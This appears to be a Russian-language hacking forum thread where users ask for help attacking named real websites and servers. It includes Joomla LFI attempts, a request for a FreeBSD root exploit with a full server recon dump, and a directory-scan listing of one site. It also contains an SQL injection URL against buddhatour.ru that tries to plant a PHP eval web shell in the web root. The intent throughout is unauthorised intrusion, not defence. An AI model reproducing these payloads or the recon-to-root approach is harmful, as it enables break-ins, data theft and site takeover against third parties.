Добрый вечер. Нашел сайт (elnino.ru) со следующей версией движка: Перепробовал все примеры последних 4-х страниц темы "Обзор уязвимостей CMS Joomla", но безрезультатно... Не могли бы вы помочь/разъяснить, что делаю не так?!
мало ли что делаешь, не факт что уязвимости есть на том сайте, может баги прикрыли или версия цмс=ки обновленная..так что сам подумай если багу выложили в паблик, как долго она проживет?...вот именно..правильно подумал..
Здравствуйте. Подскажите, плз, такую вещь - имеется доступ в админку сайта на HostCMS. Можно ли этим воспользоваться и слить весь сайт целиком?
Нигде больше, кроме просмотра страниц с фотками в галерее, переменных, которые принимают параметры, нет... Я посмотрел версию в исходниках админки, как ты написал в своем посте (site.com/administrator), но твой способ LFI не работает на этом сайте почему-то...(404 ошибка) Ну так поудаляй все оттуда...
2 Iggy Я посмотрел версию в исходниках админки, как ты написал в своем посте (site.com/administrator), но твой способ LFI не работает на этом сайте почему-то...(404 ошибка) ну это понятно,ты выяснил что джумла 1.5.x но это еще не все, тебе надо теперь выяснить бета это или какой версии релиз? но неполучится у тебя это зделать нету необходимых файлов чтобы посмотреть версию да и параметров которые я указывал,у тебя они вообще отсутствуют на сайте,так что... 1.5.0 Release Candidate 3 * @version $Id: configuration.php-dist 8946 2007-09-18 14:26:22Z louis $ 1.5.0 Release Candidate 2 * @version $Id: configuration.php-dist 8290 2007-08-01 14:03:11Z jinx $ 1.5.0 Release Candidate 1 * @version $Id: configuration.php-dist 7740 2007-06-13 21:01:25Z laurens $ 1.5.0 Beta 2 * @version $Id: configuration.php-dist 6691 2007-02-21 09:29:26Z Jinx $ 1.5.0 Beta * @version $Id: configuration.php-dist 5361 2006-10-07 19:21:08Z Jinx $
Благодарю. Вот еще подскажи - разумно ли брутить админку на этом CMS? (интересует почему именно нет/да) Разверни ответ, если не сложно...
Всем привет! Подскажите root сплойт на: FreeBSD *.com 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Wed May 27 04:46:55 MSD 2009 root@:/usr/obj/usr/src/sys/ISPSYSTEM amd64 Server software: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8e DAV/2 PHP/5.3.2 Loaded Apache modules: core, prefork, http_core, mod_so, mod_authn_file, mod_authn_dbm, mod_authn_anon, mod_authn_default, mod_authn_alias, mod_authz_host, mod_authz_groupfile, mod_authz_user, mod_authz_dbm, mod_authz_owner, mod_authz_default, mod_auth_basic, mod_auth_digest, mod_file_cache, mod_cache, mod_disk_cache, mod_dumpio, mod_reqtimeout, mod_include, mod_filter, mod_charset_lite, mod_deflate, mod_log_config, mod_logio, mod_env, mod_mime_magic, mod_cern_meta, mod_expires, mod_headers, mod_usertrack, mod_setenvif, mod_version, mod_proxy, mod_proxy_http, mod_ssl, mod_mime, mod_dav, mod_status, mod_autoindex, mod_asis, mod_info, mod_suexec, mod_cgi, mod_dav_fs, mod_vhost_alias, mod_negotiation, mod_dir, mod_imagemap, mod_actions, mod_speling, mod_userdir, mod_alias, mod_rewrite, mod_php5, mod_ispmgr Disabled PHP Functions: none Open base dir: /home/vice/data:. cURL support: no Supported databases: MySql (5.1.47) Readable /etc/passwd: no Readable /etc/shadow: no Userful: gcc, cc, ld, make, perl, tar, gzip, bzip2, nc, locate Danger: ipfw Downloaders: fetch
Поищи тут админку! » http://brahmos.com/.htaccess HTTP 403 Forbidden » http://brahmos.com/.htconfig HTTP 403 Forbidden » http://brahmos.com/.htpasswd HTTP 403 Forbidden » http://brahmos.com/archive/ HTTP 200 OK » http://brahmos.com/backoffice/ HTTP 200 OK » http://brahmos.com/cgi-bin/ HTTP 401 Authorization Required » http://brahmos.com/ControlPanel/ HTTP 200 OK » http://brahmos.com/config/ HTTP 200 OK » http://brahmos.com/download/ HTTP 200 OK » http://brahmos.com/downloads/ HTTP 302 Found » http://brahmos.com/error/ HTTP 403 Forbidden » http://brahmos.com/gallery/ HTTP 200 OK » http://brahmos.com/images/ HTTP 200 OK » http://brahmos.com/login/ HTTP 200 OK » http://brahmos.com/style/ HTTP 200 OK » http://brahmos.com/test/ HTTP 200 OK » http://brahmos.com/content/ HTTP 200 OK » http://brahmos.com/favicon.ico HTTP 200 OK » http://brahmos.com/icons/ HTTP 200 OK » http://brahmos.com/index.html HTTP 200 OK » http://brahmos.com/log/ HTTP 200 OK » http://brahmos.com/login.php HTTP 200 OK » http://brahmos.com/manual/ HTTP 200 OK » http://brahmos.com/sitemap.html HTTP 200 OK » http://brahmos.com/test.php HTTP 200 OK » http://brahmos.com/webmail/ HTTP 302 Found
to wkar: сп, я пробовал уже его... что-то не сработал. Пакет не сработал.. делал в ручную.. program.c нормально скомпилился, а вот env.c при компиляции выдал ошибки(какие точно не помню), но файл откомпиленный появился. Народ, что посоветуете?
Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\' into outfile \'/home/buddhatour/data/www/buddhatour.' at line 1 запрос: PHP: http://www.buddhatour.ru/new/?link=1+union+select+'<?php eval($_GET[v]);?>'+into+outfile+'/home/buddhatour/data/www/buddhatour.ru/e.php' Подскажите, где ошибка? ПС Мой енв скомпленый под 7.2 http://multi-up.com/297353 пашет в папке /tmp/
